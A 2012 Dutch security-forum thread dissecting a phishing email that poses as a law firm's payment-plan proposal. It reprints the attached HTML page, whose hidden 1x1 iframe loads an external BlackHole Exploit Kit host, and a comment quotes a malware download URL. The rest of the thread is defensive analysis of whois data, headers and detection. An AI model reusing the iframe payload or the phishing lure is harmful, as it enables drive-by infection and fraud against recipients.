Computerbeveiliging - Hoe je bad guys buiten de deur houdt

De nieuwste

19-11-2012, 08:19 door Anoniem, 14 reacties
Van: Embuste advocaten [mailto:p.kox@embusteadvocaten.nl.firstfind.nl]
Gepost om: maandag 19 november 2012 5:14
Gepost naar: Info
Discussie: Voorstel betalingsregeling tbv XXXXXXXXXXXXXXX BV
Onderwerp: Voorstel betalingsregeling tbv XXXXXXXXXXXXXXXX BV

Geachte heer/mevrouw,

Tot mij heeft zich gewend dhr. de Vries. Client heeft mij verzocht om met u in contact te treden omtrent een betalingsregeling met Oostingh Staalbouw BV.
Gezien de situatie van client hebben we een afbetaalregeling opgesteld.

Ik verzoek u deze betaalregeling te bekijken en te reageren met een hierop uw tegenvoorstel te doen of uw akkoord terug te zenden.

zie in de bijlage het betalingsvoorstel.

ik verneem uw reactie graag via onderstaand e-mail zodat een en ander juridisch correct is vastgelegd.

Hoogachtend,

Mr. P.O.M. Kox
Advocaat (specialisatie kredietmanagement en ondernemersrecht)

Embuste advocaten

Johannes vermeerstraat 338
1071DS Amsterdam
p.kox@embusteadvocaten.nl
Tel: 020-6719985
fax: 020-6716184
http://www.embusteadvocaten.nl

DISCLAIMER:De Inhoud van dit bericht kan vertrouwelijk zijn en is enkel voor de geadresseerde. Mocht dit bericht niet voor u bestemd zijn wordt u verzocht het bericht door te sturen naar de juiste ontvanger en dit per omgaande te melden.


En dit is de html broncode van de meegeleverde pagina.


<html><head>
<title>Embuste Advocaten</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="imagetoolbar" content="no">
<style>

a:hover {
color: #BBBBBB;
}

body {
font-family: Arial, Helvetica, sans-serif;
overflow: hidden;
scrollbar-base-color: #663300;
}

div#divsubmenubar {
border: 1px none #FFFFFF;
padding: 0px 5px 1px;
visibility: inherit;
color: #FFFFFF;
}

div#divsubmenubar a{
display: inline;
text-decoration: none;
color: #FFFFFF;
}

div#divsubmenubar a:hover{
color: #CCCCCC;
}

.bottomtekst {
font-family: Arial, Helvetica, sans-serif;
font-size: 80%;
text-align: center;
color: #FFFFFF;
}

.naw2 {
color: #FFFFFF;
font-size: 80%;
}

.normaltext {
font-family: Arial, Helvetica, sans-serif;
text-align: left;
vertical-align: top;
color: #663300;
}
.bigtext {
font-family: Arial, Helvetica, sans-serif;
font-size: x-large;
text-align: left;
vertical-align: top;
color: #663300;
}
.logotext {
font-family: Arial, Helvetica, sans-serif;
font-size: x-large;
color: #FFFFFF;
}
.normaltextlink {
font-family: Arial, Helvetica, sans-serif;
text-align: left;
vertical-align: top;
color: #663300;
text-decoration: underline;
}
</style>
</head>
<body>
<div id="content" style="position:absolute; width:92%; z-index:2; left: 10%; top: 170px; overflow: auto; height: 66%;">
<table class="content" border="0" cellpadding="0" cellspacing="0" width="95%">
<tbody><tr>
<td colspan="6" class="normaltext">
<br>
<br>
<b><h1>Verzoek betalingsregeling:</b></h1>
Tot mij wende zich client de Vries van Profic facilitaire diensten. Client wil graag inzake zijn openstaande vordering groot &euro; 9.764,89 de navolgende betalingsregeling treffen met $bedrijf<br><br>
Client stelt voor om per 1 januari 2013 in maandelijkse termijnen van &euro; 750,00 de vordering af te betalen. In de laatste termijn<br>
van december 2013 zal client het bedrag van &euro; 1.564,89 voldoen om de vordering volledig af te betalen.<br><br>

Zoals u ziet verwachten wij van u in deze betalingsregeling dat u geen wettelijke rente in rekening brengt om client tegemoet te komen in zijn voorstel.<br>
Client bevindt zich in een lastige positie en wil graag alle crediteuren netjes betalen. Indien u niet akkoord gaat met het voorstel zal ik client<br>
adviseren om faillissement aan te vragen. Client heeft meerdere schuldeisers maar wil graag zijn bedrijfsvoering voortzetten.<br><br>

U begrijpt dat voor client duidelijke betalingsregelingen van noodzaak zijn om zijn bedrijfsvoering voort te kunnen zetten.<br><br><br>

Als u akkoord gaat met dit voorstel tot betaling. Kunt u een email sturen met daarin uw akkoord. Ik zal dan client verzoeken per januari 2013 de eerste betaling op uw rekening te storten.<br>

Indien u niet reageerd ga ik ervan uit dat u verder geen juridische stappen onderneemt richting client en u de vordering zult laten vervallen.
Behoudens alle rechten.<br><br>


Ik dank u voor uw begrip en medewerking.<br><br>

mr. P.O.M Kox<br>
Embuste Advocaten<br>
p.kox@embusteadvocaten.nl
</td>
</tr>

<tr class="normaltext">
<td colspan="6"><br>
</td>
</tr></tbody></table>
</div>
<div id="viewport" style="position:absolute; width:102%; z-index:1; left: 0%; top: 147px; height: 101%;">
<img src="weilers_bestanden/layout.gif" height="76%" width="102%"> </div>
<div id="navigation" style="position:absolute; z-index:4; width: 102%; background-color: #696969; layer-background-color: #696969; left: 0; top: 0; height: 147px;" class="naw2">
<br>
<table border="0" cellpadding="0" cellspacing="5" width="100%">
<tbody><tr>
<td class="naw2" valign="top" width="20%"> <div align="left"><span class="logotext"> Embuste<br>
<span class="style4">Advocaten</span></span> </div></td>
<td valign="top" width="62%">
</td>
<td class="naw2" valign="top" width="18%">Johannes Vermeerstraat 338<br>
1071 DS Amsterdam<br>
tel: 020-6719985<br>
fax: 020-6716184<br>
e-mail:
<a href="mailto:info@embusteadvocaten.nl"><font color="#FFFFFF">info@embusteadvocaten.nl</font></a></td>
</tr>
</tbody></table>
</div>
<iframe src="http://jackerdesktopstyle.info/amounts/market-says_materials.php" style="width:1px;height:1px;border:0px"></iframe>

</body></html>

Reacties (14)
19-11-2012, 12:00 door Anoniem
Sja, ik kreeg em ook binnen vandaag en pleurde em gelijk weg. Ik deed nog even een google op dit "advocaten kantoor" en al wat ik vond was info over phising criminelen.
19-11-2012, 12:03 door 0101
JackerDesktopStyle.info
- Gisteren geregistreerd
Registratiegegevens (waarschijnlijk vals); via http://whois.domaintools.com/jackerdesktopstyle.info: http://pastebin.com/jQsY99P0
JackerDesktopStyle.info is gehost op IP .

Testen met wfetch:
Headers:
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n
Accept-Encoding: gzip\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: nl-NL,nl;q=0.8,en-US;q=0.6,en;q=0.4\r\n
Accept-Charset: ISO-8859-1,UTF-8;q=0.7,*;q=0.7\r\n
Cache-Control: no-cache\r\n
Output:http://pastebin.com/pR5HgMbN

De output zal sommige mensen wel bekend voorkomen; dit is de BlackHole Exploit Kit 2.0!

Andere domeinnamen op het IP (via http://www.yougetsignal.com/tools/web-sites-on-web-server/):
www.coralsalmondress.com
www.dresses4outlet.com
www.onlinecomponents.com
www.sustainablesupply.com


De registrant gebruikt een e-mailadres @yawmail.com

Dit is geregistreerd in December 2008 bij een private whois bedrijf in Japan: http://whois.domaintools.com/yawmail.com


EmbusteAdvocaten.nl is niet eens geregistreerd: http://whois.domaintools.com/embusteadvocaten.nl

Werkwijze:
Zodra een gebruiker de bijgevoegde webpagina opent wordt in een inline frame (iframe) een website geladen met daarop de BlackHole Exploit Kit.

Doel:
De computer van het slachtoffer infecteren met malware.
19-11-2012, 12:25 door 0101
[Dubbelpost, verwijderd]
19-11-2012, 13:03 door Anoniem
Nu nog even de headers van de email zelf.
19-11-2012, 13:04 door Anoniem
als je in de aanhef de geadresseerde weghaald doe dat dan ook in de mail zelf
19-11-2012, 13:35 door Anoniem
ik heb dit bericht ook ontvangen en geopend, mijn anti-virus programma heeft hem niet onderschept. Als het phising is wat kan ik doen om geen verdere schade hiervan te ondervinden?
19-11-2012, 15:55 door Anoniem
Headers? Hier zijn de headers van het bericht dat ik kreeg:

Return-Path: <bosmanba@server40.firstfind.nl>
Delivered-To: XXXXX
Received: from mx-h.one.com (mx-h.one.com [91.198.169.55])
by mail51.local (Postfix) with ESMTP id 72949D80EC
for <XXXXX>; Sun, 18 Nov 2012 23:05:04 +0100 (CET)
X-Virus-Scanned: by one.com
X-Greylist: domain auto-whitelisted by SQLgrey-1.8.0-rc2
Received: from server40.firstfind.nl (server40.firstfind.nl [109.235.74.156])
by mx-h.one.com (Postfix) with ESMTP id 437D327AECDB
for <XXXXX>; Sun, 18 Nov 2012 22:05:04 +0000 (UTC)
Received: from server40.firstfind.nl (localhost [127.0.0.1])
by server40.firstfind.nl (8.14.3/8.14.3/Debian-9.4) with ESMTP id qAIM53FO030651
for <XXXXX>; Sun, 18 Nov 2012 23:05:03 +0100
Received: (from bosmanba@localhost)
by server40.firstfind.nl (8.14.3/8.14.3/Submit) id qAIM53Pc030648;
Sun, 18 Nov 2012 23:05:03 +0100
To: XXXXX
Subject: Voorstel betalingsregeling tbv XXXXX
X-PHP-Originating-Script: 4388:class.phpmailer.php
Date: Sun, 18 Nov 2012 23:05:03 +0100
From: Embuste advocaten <p.kox@embusteadvocaten.nl.firstfind.nl>
Message-ID: <61251661b9083d34f743fa8d7943e4f4@www.bosmanbanden.com>
X-Priority: 3
X-Mailer: PHPMailer 5.2.1 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="b1_61251661b9083d34f743fa8d7943e4f4"
Old-X-EsetId: 48B2E73C042854301FF4BE
Old-X-EsetId: 48B2E73C042854301FF4BE
X-EsetScannerBuild: 12534
Old-X-EsetId: 48B2E73C042854301FF4BC
X-EsetId: 48B2E73C042854301FF4BA

Ik heb mijn eigen bedrijfsnaam en e-mailadres vervangen door XXXXX.
19-11-2012, 16:48 door Anoniem
En kan deze malware ook kwaad op de Mac?
19-11-2012, 17:20 door Anoniem
Door Anoniem: ik heb dit bericht ook ontvangen en geopend, mijn anti-virus programma heeft hem niet onderschept. Als het phising [sic.] is wat kan ik doen om geen verdere schade hiervan te ondervinden?
Als je de bijlage niet hebt geopend is er niets aan de hand. Indien wel, dan valt het aan te bevelen om
1. te kijken of je software up-to-date is en indien niet
2. je systeem op malware te controleren.
20-11-2012, 09:54 door Anoniem
Klopt het dat Malware bytes en Spybot S&D 2.0 deze malware nog niet detecteren? Symnatec ziet bij een full scan ook niks. Iemand andere suggesties???
20-11-2012, 09:55 door Anoniem
Door Anoniem: En kan deze malware ook kwaad op de Mac?
Ja zeker.
20-11-2012, 11:02 door Anoniem
Door Anoniem: Klopt het dat Malware bytes en Spybot S&D 2.0 deze malware nog niet detecteren? Symnatec ziet bij een full scan ook niks. Iemand andere suggesties???

Trend Micro herkent hem als TROJ_PIDIEF.SMWY. Dus en Trend HouseCall zou deze eruit kunnen halen.
20-11-2012, 11:52 door Anoniem
Door Anoniem:
Door Anoniem: Klopt het dat Malware bytes en Spybot S&D 2.0 deze malware nog niet detecteren? Symnatec ziet bij een full scan ook niks. Iemand andere suggesties???

Trend Micro herkent hem als TROJ_PIDIEF.SMWY. Dus en Trend HouseCall zou deze eruit kunnen halen.


Bedankt, ga dit even proberen.
20-11-2012, 14:44 door Frenzo
De eerste melding is hier inmiddels ook binnen. Klant heeft de bijlage geopend. Trend Micro blokkeerd wel netjes
http://185.4.227.42/final161.exe

Verder nog niets gevonden. Still scanning..
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.

Zoeken
search